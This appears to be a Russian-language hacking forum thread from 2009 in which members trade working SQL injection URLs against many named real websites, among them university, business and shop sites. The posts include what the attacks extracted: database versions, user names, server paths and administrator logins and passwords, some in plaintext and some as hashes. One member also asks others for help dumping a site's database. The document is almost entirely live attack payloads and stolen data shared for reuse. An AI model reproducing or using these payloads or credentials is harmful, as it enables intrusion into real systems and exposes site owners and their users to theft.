http://mobefree.ru/wap/wapmain.php?option=news&action=link&id=-19141+union+select+1,2,3,concat(username,0x3a,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
http://www.toalgenclik.com/wap/wapmain.php?option=onews&action=cat&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28+from+jos_users+limit+0,1--
http://www.mazdaeff.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+jos_users+limit+0,1--
http://www.taxibalk.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+mos_users+limit+0,1--
http://gozopolitan.org/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+jos_users+limit+0,1--
http://www.abilieve2005.de/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+mos_users
Cennarios
27.02.2009, 17:28
http://community.realitytvworld.com/gallery/showgallery.php?cat=-1+union+select+1,concat(0x3a3a,concat_ws(0x3a3a,us ername,password,icq,email)),3+from+ppusers+limit+0 ,1--
login: Admin
pass:02b2ea2e07bf23853ee3b1c3798b5b0c(не подбрутился)
буржуйская куйня. ипическое количество юзеров
Pagerank: 5
тИЦ: 1200
http://www.etver.ru/lenta/index.php?newsid=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--
Database Version : 4.1.25-log
Database name : etver
User name : etver@localhost
----------------------------------------#
Pagerank: 4
тИЦ: 700
http://www.horseworld.ru/?news=-1+union+select+1,2,concat _ws(0x 3a,version(),database(),user()),4,5,6--
Database Version : 5.1.22-rc
Database name : horseworld
User name : horseworld1@89.111.191.34
http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ version() ),1,1))>x--
x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121
http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ database() ),1,1))>x--
x=104,101,108,108,111,107,105,100,115
http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+ user() ),1,1))>x--
x=104,101,108,108,111,107,105,100,115,64,108,111,9 9,97,108,104,111,115,116
Version : 5.0.67-community
Database: hellokids
User : hellokids@localhost
AkyHa_MaTaTa
27.02.2009, 20:10
www.aromat.ru PageRank - 5 ТиЦ - 450 (вывод в титле)
http://www.aromat.ru/parfum/women_type.php3?tip=-3+union+select+concat_ws(0x3A,user(),@@version,dat abase())+--+
user() - aromat@192.168.26.101
@@version - 5.0.60-log
database() - aromat
http://www.reporterspecialdearges.ro/_articol/Singuratate-liberala-intr-un-judet-controlat-de-PSD-/1998/2+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0 x3a,Version(),Database(),User()),0x71),0x71),2,3,4 ,5,6,7,8,9,10,11,12--/
Database Version: 4.1.21-standard-log
Database name: softpage_arges
User name: softpage_erkro@localhost
-m0rgan-
27.02.2009, 22:18
Mission Cataract USA
http://www.missioncataractusa.org/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(version(),user(),databa se()),3,4,5--
версия/юзер/бд:
missionc_user@localhost4.1.22-standard-logmissionc_cms
-----------------------------------------------------------
The End!
Московская торгово-промышленная палата
Pagerank: 6
тИЦ: 1500
http://www.mostpp.ru/news.php?&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ ws(0x3a ,version(),database(),user()),10,11,12,13,14,15--
Database Version : 5.0.67
Database name : mtpp
User name : root@zvm5.host.ru
В целях безопасности от разных дебилов которые дефейсят сайты палат Москвы и РФ, выкладывать админку я не стал.
http://www.termomax.ro/subcateg/-153+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS (0x3a,Version(),Database(),User()),0x71),0x71)/*/Din_aluminiu/
Database Version: 4.1.22-standard-log
Database name: rter1702_termomax
User name: rter1702_termoma@localhost
ph1l1ster
28.02.2009, 00:41
http://www.radiology.wisc.edu/newsContent.php?id=-189+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4,5,6,7,8,9,10
http://nflrc.msu.edu/login/scripts/workshop.php?id=-189+union+select+1,2,3,concat(version(),0x3a,user( ),0x3a,database()),5,6,7,8,9,10
http://mulibraries.missouri.edu/about/adoptabook/after-details.php?id=-189+union+select+1,2,3,4,concat(version(),0x3a,use r(),0x3a,database()),6,7,8+from+information_Schema .tables
-m0rgan-
28.02.2009, 01:57
http://www.playcentre.org.nz/product.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin+limit+ 0,1--
логин/пасс:
Justine:purple
---------------------------------------------------------
The End!
http://www.martinsgourmet.com/subproduct.php?id=-23+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8&sub=Medium-Mild_Roasts
Database Version: 5.0.75-community-log
Database name: martinsg_gourmet
User name: martinsg_user1@localhost
AkyHa_MaTaTa
28.02.2009, 10:40
www.stroyolymp.com Pr- 5 ТиЦ - 650
http://www.stroyolymp.com/index.php?node=0&category=35+union+select+1,concat_ws(0x3A,user(),v ersion(),database()),3,4,5,6,7,8,9,10,11+--+
user():stroyoly@dix.hc.ru
@@version:4.1.22
datbase:wwwstroyolympcom
www.scooter-club.ru Pr- 5 ТиЦ - 300
http://www.scooter-club.ru/index.php?content=yes&page_id=-75+union+select+1,concat_ws(0x3A,user(),@@version, database())+--+
user():scooterc_scooter@localhost
@@version:4.1.22-standard-log
datbase:scooterc_base
webcat.info ТиЦ 1000 вывод в титле
http://webcat.info/category/7687615'+union+select+concat_ws(0x3a,user(),versio n(),database())+--+/start/110/
user():seonetsp@localhost
@@version:5.0.45
datbase:seonetsp_webcat
http://www.edituraparalela45.ro/fictiune/detalii_carte.php?titluID=-1421+UNION+SELECT+1,convert(concat_ws(0x3a,version (),database(),user())+using+latin1),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30&sess=8c6eb35615f6a055f8dd8ff63c7c7de1&uid=0
Database Version: 5.0.18-log
Database name: edituraparalela4
User name: edituraparalela4@www1.linux.romtelecom.net.
ph1l1ster
28.02.2009, 18:18
http://etd.louisville.edu/view-etd.php?ID=-189+union+select+1,2,3,4,5,6,7,8,concat(version(), 0x3a,user()),table_name,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+information_schema.tables
http://www.westga.edu/~distance/ojdla/search_results_id.php?id=-189+union+Select+1,2,3,concat(version(),0x3a,user( )),5,6,7,8,9,10,11
http://striweb.si.edu/esp/tesp/details.php?id=189+AND+ascii(lower(substring(versi on(),1,1)))=51
http://athletics.gmc.edu/mtennis/article.php?id=-189+union+select+1,2,3,4,5,concat(user(),0x3a,vers ion()),7,8,9,10,11
http://policies.fiu.edu/record_profile.php?id=-189+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fro m+users+limit+0,1
http://www.lssu.edu/hr/apjobsdesc.php?id=-189+union+Select+1,2,concat(version(),0x3a,user()) ,4,5,6,7,8,9
http://www.nmsu.edu/~ucomm/database/show_details.php?ID=-189+union+select+1,2,user(),version(),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
http://osulibrary.oregonstate.edu/research.php/detail.php?id=189+union+select+1,2,3,4,5,6,7,8,9,1 0,concat(version(),0x3a,user()),12,13,14,15--
http://www.aua.edu/course.php?ID=-189+union+select+1,2,3,concat(user(),0x3a,version( )),5,6,7,8,9
http://www.sandiego.edu/news/presskit/detail.php?id=-189+union+select+1,2,3,concat(user(),0x3a,version( )),5,6,7,8,9
http://www.happyhome.ro/product.php?id=-31+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12/*
Database Version: 4.0.18
Database name: lafix
User name: timega@main.dweb.ro
AkyHa_MaTaTa
28.02.2009, 18:51
www.tangomania.ru Pr - 3 ТиЦ 325
http://www.tangomania.ru/articlesabout.php?uin=-1+union+select+1,2,3,concat_ws(0x3A,user(),version (),database()),5,6,7,8,9+--+
user():tangomania@localhost
@@version:4.1.22-log
database():tangomania
www.prist.ru Pr - 5 ТиЦ 850
http://www.prist.ru/produce.php/card/sold.htm?id=453222985123123+union+select+1,2,3,4,5 ,concat_ws(0x3a,user(),@@version,database()),7,8,9 ,10,11,12,13,14,15,16+--+
user() : prist_mysql@10.1.25.64
@@version : 4.1.22
database() : prist_db
http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+version()),1,1 ))>x--
x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121,45,108,111,103
http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+database()),1, 1))>x--
x=102,105,110,97,108,100,95,102,111,108,105,101
http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+user()),1,1))>x--
x=102,105,110,97,108,100,95,97,100,109,105,110,64, 108,111,99,97,108,104,111,115,116
Version : 5.0.67-community-log
Database : finald_folie
User : finald_admin@localhost
dr.Pilulkin
28.02.2009, 21:45
http://www.eleven.co.il/print.php?id=-10591+union+select+1,2,3,4,5,6,7,8,9,user()--
eleven@localhost
5.0.77
elevenart
/var/db/mysql/
http://www.eastrovedica.in/article.php?id=12317+order+by+17--&act=print
wisdoma_indiart@localhost
5.1.30
portbld-freebsd7.1
http://www.ircolours.ro/index.php?view=product&id=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17
Database Version: 5.0.67-community-log
Database name: ircolour_ircolours
User name: ircolour_webagen@localhost
AkyHa_MaTaTa
28.02.2009, 22:09
bugeisha.ru PR-4 ТиЦ 650 вывод в сурсе страницы(в <input type="hidden")
http://bugeisha.ru/aikido/aikido/post.php3?topic_id=-1+union+select+1,2,3,4,concat(0x27203e3c62723e,use r(),0x3A,version(),0x3a,database(),0x3c212d2d2d2d) +--+
интересные колонки:
bugeisha_db.chat_users=>nick
bugeisha_db.chat_users=>passwd
bugeisha_db.chat_users=>real_name
bugeisha_db.chat_users=>city
bugeisha_db.chat_users=>age
bugeisha_db.chat_users=>email
bugeisha_db.chat_users=>icq
bugeisha_db.chat_users=>yahoo
bugeisha_db.chat_users=>phone
bugeisha_db.chat_users=>homepage
bugeisha_db.chat_users=>biography
bugeisha_db.chat_users=>hobby
bugeisha_db.chat_users=>links
bugeisha_db.chat_users=>about
bugeisha_db.chat_users=>disable
bugeisha_db.chat_users=>logged_in
bugeisha_db.chat_users=>admin
bugeisha_db.chat_users=>msg_len
bugeisha_db.chat_users=>refresh
bugeisha_db.chat_users=>last_time
bugeisha_db.chat_users=>host
bugeisha_db.chat_users=>last_private
bugeisha_db.chat_users=>ignore_hosts
bugeisha_db.chat_users=>photo
bugeisha_db.chat_users=>regdate
bugeisha_db.chat_users=>gallery
bugeisha_db.chat_users=>history
bugeisha_db.chat_users=>last_post
bugeisha_db.chat_users2=>nick
bugeisha_db.chat_users2=>passwd
bugeisha_db.chat_users2=>real_name
bugeisha_db.chat_users2=>city
bugeisha_db.chat_users2=>age
bugeisha_db.chat_users2=>email
bugeisha_db.chat_users2=>icq
bugeisha_db.chat_users2=>yahoo
bugeisha_db.chat_users2=>phone
bugeisha_db.chat_users2=>homepage
bugeisha_db.chat_users2=>biography
bugeisha_db.chat_users2=>hobby
bugeisha_db.chat_users2=>links
bugeisha_db.chat_users2=>about
bugeisha_db.chat_users2=>disable
bugeisha_db.chat_users2=>logged_in
bugeisha_db.chat_users2=>admin
bugeisha_db.chat_users2=>msg_len
bugeisha_db.chat_users2=>refresh
bugeisha_db.chat_users2=>last_time
bugeisha_db.chat_users2=>host
bugeisha_db.chat_users2=>last_private
bugeisha_db.chat_users2=>ignore_hosts
bugeisha_db.chat_users2=>photo
bugeisha_db.chat_users2=>regdate
bugeisha_db.chat_users2=>gallery
bugeisha_db.chat_users2=>history
bugeisha_db.chat_users2=>last_post
.................................................. ..........
bugeisha_db.h2_chat_users=>nick
bugeisha_db.h2_chat_users=>passwd
bugeisha_db.h2_chat_users=>real_name
bugeisha_db.h2_chat_users=>city
bugeisha_db.h2_chat_users=>age
bugeisha_db.h2_chat_users=>email
bugeisha_db.h2_chat_users=>icq
bugeisha_db.h2_chat_users=>yahoo
bugeisha_db.h2_chat_users=>phone
bugeisha_db.h2_chat_users=>homepage
bugeisha_db.h2_chat_users=>biography
bugeisha_db.h2_chat_users=>hobby
bugeisha_db.h2_chat_users=>links
bugeisha_db.h2_chat_users=>about
bugeisha_db.h2_chat_users=>disable
bugeisha_db.h2_chat_users=>logged_in
bugeisha_db.h2_chat_users=>admin
bugeisha_db.h2_chat_users=>msg_len
bugeisha_db.h2_chat_users=>refresh
bugeisha_db.h2_chat_users=>last_time
bugeisha_db.h2_chat_users=>host
bugeisha_db.h2_chat_users=>last_private
bugeisha_db.h2_chat_users=>ignore_hosts
bugeisha_db.h2_chat_users=>photo
bugeisha_db.h2_chat_users=>regdate
bugeisha_db.h2_chat_users=>gallery
bugeisha_db.h2_chat_users=>history
bugeisha_db.h2_chat_users=>last_post
.................................................. ................
bugeisha_db.users=>us_id
bugeisha_db.users=>login
bugeisha_db.users=>email
bugeisha_db.users=>passwd
bugeisha_db.users=>org
bugeisha_db.users=>url
bugeisha_db.users=>moderator
bugeisha_db.users=>dob
bugeisha_db.users=>army
bugeisha_db.users=>rodzanyatiy
bugeisha_db.users=>family
bugeisha_db.users=>sudimosti
bugeisha_db.users=>wear
bugeisha_db.users=>community
bugeisha_db.users=>likefilms
bugeisha_db.users=>likemusic
bugeisha_db.users=>likebooks
bugeisha_db.users=>watch
bugeisha_db.users=>cars
bugeisha_db.users=>motto
bugeisha_db.users=>reader
bugeisha_db.users=>r_name
http://www.artmobila.md/index.php?section=news&id=-1234271747+union+select+1,concat_ws(0x3a,version() ,database(),user()),3&lang=ru
Database Version: 5.0.51
Database name: artmobil_artmobila
User name: artmobil_site@localhost
Автоэкзотика
Pagerank: 5
тИЦ: 600
http://www.autoexotica.ru/news/?nid=1+union+select+1,concat _ws(0x3a,versio n(),database(),user()),3,4,5,6,7,8,9,10,11--
Database Version : 5.0.45
Database name : autoexotica
User name : autoexoticaru@localhost
юзеры выводятся без лимита:
http://www.autoexotica.ru/news/?nid=1+union+select+1,conca t_ws(0x3a,name,member_login_key),3,4,5,6,7,8,9,10, 11+from+ibf_members--
админ:
autoexotica:3bceae1f772c17b075b311e2a6eacb8b
---------------------------------------------------------#
Pagerank: 3
тИЦ: 250
http://www.vw-club.ru/vw/news/show_news.php?id=-1+union+select+1,concat_ ws(0x3a,version() ,database(),user()),3,4,5,6--
Database Version : 4.1.21-log
Database name : rds_vwclub
User name : rds_vwclub@localhost
http://www.naturalwoodfloor.ro/parchet_specificatii.php?id=-36+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6
Database Version: 5.0.67-community-log
Database name: naturalw_db
User name: naturalw_acces@localhost
Assembler
01.03.2009, 02:33
www.magnet.ru
PR: 4
Тиц: 180
Версия: 5.0.51a-log
База данных: magnetru
Юзверь: alex192@192.168.0.80
http://magnet.ru/news.php?nid=2131231%20union%20select%201,concat(p assword,0x3a,user),3,4,5%20from%20mysql.user%20lim it%201,1--
Логин: alex
Пароль: *676243218923905CF94CB52A3C9D3EB30CE8E20D
PS: File priv = Y
/usr/local/www/client/magnet.ru/www/
Путь =))
Дальше думаю сами курите че можно сделать -)
http://www.formul.ru
ВНИМАНИЕ, Мнеб слить движок их желательно каэшн прям с базой)...
Прошу помощи в осуществлении))
В Личку
Админка: http://www.formul.ru/admin/
Нарыл это:
http://www.formul.ru/index.php?cat_id=-1'+union+select+1,2,3,4,5,6,column_name,8,9,0,10,1 1,12,13,14,15,16,17,18,19,20+CPU_USER+from+informa tion_schema.columns/*
Assembler
01.03.2009, 03:05
http://trubotorg33.ru
PR: 1
Тиц: 0
Версия: 5.0.75
База данных: trt
Юзверь: root@localhost
http://www.trubotorg33.ru/index.php?id=12&nid=1342343%20union%20select%201,2,3,concat_ws(0x3 a,id,name,passw),5,6,7,8,9%20from%20users--
Админка: Ненашел =(
Логин: adm
Пароль: 110001
Есть доступ к mysql.user
File Priv = Y =)
/home/edu/data/www/trubotorg33.ru/class/
Че то седня фортит=)
http://media-empire.net/spam/e-Spam.php?intSpamID=-251+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8,9,10,11,12--
ewok_2_w@209.68.2.53
5.0.67-log
ewok_bloods
Assembler
01.03.2009, 03:22
http://snm.nnov.ru
PR: 4
Тиц: 30
Версия: 4.0.25
База данных: snmsila
Юзверь: snmsila@localhost
http://www.snm.nnov.ru/?doc=4&id=12&nid=-1%20union%20select%201,2,3,4,5--
http://topmayka.com/index.php?action=looktshirt&id=-229%20union%20select%201,version(),3,4,5,6,7,8,9,1 0%20from%20users%20--
version::4.1.22-log
http://www.edilgroup.ro/punct-presa-detaliu.php?id=-9+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13
Database Version: 5.0.32-Debian_7etch6
Database name: edilgroup
User name: edilgroup@localhost
S0ulVortex
01.03.2009, 10:38
www.kos-check.com PR=3
http://www.kos-check.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(version(),user(),databa se()),3,4,5--
kosmma_admin@localhost
4.1.22-standard-log
kosmma_cms
www.dsm.edu.uy PR=5
http://www.dsm.edu.uy/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,1,user(),3, version(),5,6,7,8,9,10,11--
5.0.51a-community
dsmedu_admin@localhost
AkyHa_MaTaTa
01.03.2009, 11:26
www.kop.ru pr-3 Тиц - 400
http://www.kop.ru/?go=issues&issue=-79+union+select+1,2,3,4,concat_ws(0x3A,@@version,u ser()),6,7+--+
@@version: 5.0.45
user(): truster@garant-sk-97.ip.PeterStar.net
mailbrush
01.03.2009, 11:32
artpace.org - PR5 тИЦ - 10
http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),database(),version()),8/*
Есть еще табла sec_user, но там ничего интерестного...
http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,table_name,6,7,8+from+i nformation_schema.tables+limit+38,1/*
http://www.tiglastal.ro/produse.php?cat=3&scat=-23+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7
Database Version: 4.1.22-standard
Database name: tiglas_tiglas
User name: tiglas_tiglas@localhost
http://www.favisan.ro/catalog.php?detalii=-171+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8
Database Version: 4.1.22-standard
Database name: favisan_favisan
User name: favisan@localhost
S0ulVortex
01.03.2009, 12:35
Интернет магазин
saktalingchan.com PR=5
Database saktalin_shop
Таблицы:
CJ_UsersOnline
true_admin
true_boardans
true_boardque
true_boardworld
true_config
true_confirm
true_content
true_contentcat
true_contentsub
true_gallery
true_gallerycat
true_help
true_help2
true_items
true_links
true_product
true_productcategory
true_productcategorysub
true_proname
true_sale
true_ticket
http://www.saktalingchan.com/product.php?catid=1&catsubid=3&id=171+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3, id,user,pass ),10,11,12,13,14,15,16,17,18,19,20+from+true_admin--
С выводом пароля че-то втыкал долго не думал что pass :)
2 админа
login:saktalingchan pass:8687222
login:trueamulet pass:jwebmaster
Админку не нашел :( правда я её и не особо искал :)
grandlite.co.th
Database grandlit_db
Table:
grandliteadmin
prdadep
prdbcat
prdcprd
Сайт ваще весь дырявый как друшлак :)
http://www.grandlite.co.th/onproduct.php?id=277+UNION+SELECT+1,2,3,4,concat_w s(0x3,password),6,7,8,9,10,11+from+grandliteadmin+ limit+1,1--
http://www.grandlite.co.th/product.php?depid=9+UNION+SELECT+1,2,3,4,concat_ws (0x3,password),6,7,8,9,10,11+from+grandliteadmin--
Админку не нашёл и тут. Все что удалось узнать это pass=password а логин скоре всего admin.
-m0rgan-
01.03.2009, 15:05
АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.
http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5,6,7,8--
версия/юзер/бд:
faq@blade22.geenpunt.nl5.0.32-Debian_7etch8faq
------------------------------------------------------------------
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3--
версия/юзер/бд:
educos@www03.ip2.net5.0.51educos
------------------------------------------------------------------
http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),data base())--
версия/юзер/бд:
haas@10.171.105.65.0.32-Debian_7etch8-logjan
----------------------------------------------------------------
http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4--
версия/юзер/бд:
5053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha
-----------------------------------------------------------------
http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),data base()),1--
версия/юзер/бд:
artinnovat_main@localhost4.0.23-standard-logartinnovat_main
------------------------------------------------------------------
http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7,8,9,10,11--
версия/юзер/бд:
tamayn32_tamaynu@localhost4.1.22-standardtamayn32_tamaynut
----------------------------------------------------------------
http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),u ser(),database()),6,7--
версия/юзер/бд:
trovet_user@localhost5.0.27trovet_data
---------------------------------------------------------------
http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13--
версия/юзер/бд:
26000gezichten@localhost4.0.24_Debian-10sarge2-log26000gezichten
--------------------------------------------------------------
http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2--
версия/юзер/бд:
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom
---------------------------------------------------------------
http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version (),user(),database())+using+latin1),4,5--
версия/юзер/бд:
sitesuntrack@localhost4.1.12-standard-logsuntrack
----------------------------------------------------------------------
The End!
http://www.bmwstyle.ru/bmw.php?module=news&news_type=cur_id&news_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 5.0.67-0ubuntu6
Database name : www_bmwstyle_ru
User name : bmwstyle@localhost
S0ulVortex
01.03.2009, 15:35
paraisobahamas.com PR=3
http://paraisobahamas.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard-log
user: paraisob_admin@localhost
database: paraisob_cms
-m0rgan-
01.03.2009, 17:18
Продолжение славного дела:)
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version (),user(),database()),8,9,10,11,12,13,14,15,16,17--
версия/юзер/бд:
26872admin@10.0.5.615.0.51a-3ubuntu5.126872admin
----------------------------------------------------------
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),use r(),database())+using+latin1)--
версия/юзер/бд:
dagranietb_gran@localhost4.1.12-standard-logdagranietb_gran
----------------------------------------------------------
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4,5,6,7--
версия/юзер/бд:
spsrasd@localhost5.0.58cms
---------------------------------------------------------
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:
digit93@localhost5.0.27digitaccess
--------------------------------------------------------
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database()),4,5,6,7,8,9--
версия/юзер/бд:
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521
-------------------------------------------------------
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version() ,user(),database())+using+latin1),3,4,5,6--
версия/юзер/бд:
смотрим в свойствах картинки:)
serema@localhost4.1.10aserema_fr
--------------------------------------------------
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase())--
версия/юзер/бд:
elio_trope@localhost5.0.32-Debian_7etch8-logeliotrope_base
---------------------------------------------------------
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user( ),database()),4,5,6,7--
версия/юзер/бд:
musique@euterpe.culture.fr5.0.45-Max-logmusique
--------------------------------------------------------
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4,5,6,7--
версия/юзер/бд:
designfa@10.0.75.124.0.25-standard-logdesignfa
--------------------------------------------------------
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(), database()),3,4--
версия/юзер/бд:
cshm@localhost5.0.27cshm
Думаю на первое время вам хватит:)
-----------------------------------------------------
The End!
Pagerank: 6
тИЦ: 2300
http://www.sibfair.ru/?current=262&nid=-1+union+select+1,aes_ decrypt(aes_encrypt( concat_ws(0x3a,version(),database(),user()),0x71), 0x71),3,4,5,6--
Database Version : 4.1.16
Database name : fair
User name : fair@localhost
http://www.capitaneanubebi.ro/Web/cjasbr/pagina.php?id=-3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*
Database Version: 5.0.45-log
Database name: cjasbr
User name: cjasbr@core3.hostbase.net
mailbrush
01.03.2009, 19:03
http://www.webwisesage.com/maxwrite/diarypage.php?did=-9999999999999+union+select+1,2,concat_ws(0x3a,user (),database(),version()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17
user():database():version()
xwebwisesage@serenity.futurequest.net:xwebwisesage-wws:4.0.2
Это уязвимый двиг: http://forum.antichat.ru/showpost.php?p=1144179&postcount=98
PS: Сорри, не увидел, что openwds уже был...
http://www.voxmarsign.ro/produse-detalii.php?id=-54+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--&t=8
Database Version: 5.0.45-log
Database name: voxmar_sign
User name: voxmar_sign@core3.hostbase.net
S0ulVortex
01.03.2009, 19:22
www.fresno-shopping.com PR=2
http://www.fresno-shopping.com/news.php?ax=v&n=13&id=8&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard-log
user: fresnosh_user@localhost
database: fresnosh_cms
www.manchester-center.com PR=4
http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard
user: manchest_user@localhost
database: manchest_cms
mailbrush
01.03.2009, 19:24
http://www.robkall.com/maxwrite/diarypage.php?did=-999999+union+select+1,2,3,concat_ws(0x3a,user(),da tabase(),version()),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21
user:database:version
opednews_vidya@localhost:opednews_pearl:4.1.22-standard-log
http://www.awakeningpath.com/maxw/diarypage.php?did=-999999999+union+select+1,2,concat_ws(0x3a,user(),d atabase(),version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17 user:database:version
xawakeningpath@hugo.futurequest.net:xawakeningpath-awaken:5.0.70-log
http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+version()), 1,1))>x--
x=52,46,49,46,50,48,45,108,111,103
http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+database()) ,1,1))>x--
x=115,104,99,111,110,116,105,110,101,110,116,97,10 8,104,111,116,101,108,115,114,111
http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+user()),1,1 ))>x--
x=99,111,110,116,105,110,101,110,116,97,108,104,11 1,114,111,64,56,53,46,57,46,50,50,46,50,51,54
Version : 4.1.20-log
Database : shcontinentalhotelsro
User : continentalhoro@85.9.22.236
Ленинградская торгово-промышленная Палата
Pagerank: 5
тИЦ: 700
http://www.lotpp.ru/rnews.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--
Database Version : 4.1.19-log
Database name : lotpp2
User name : lotpp@localhost
http://www.blacklist-online.ro/?mn=articole&id=-37+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())
Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_blacklist
User name: saxas_blacklist@supremecenter52.com
mailbrush
01.03.2009, 22:17
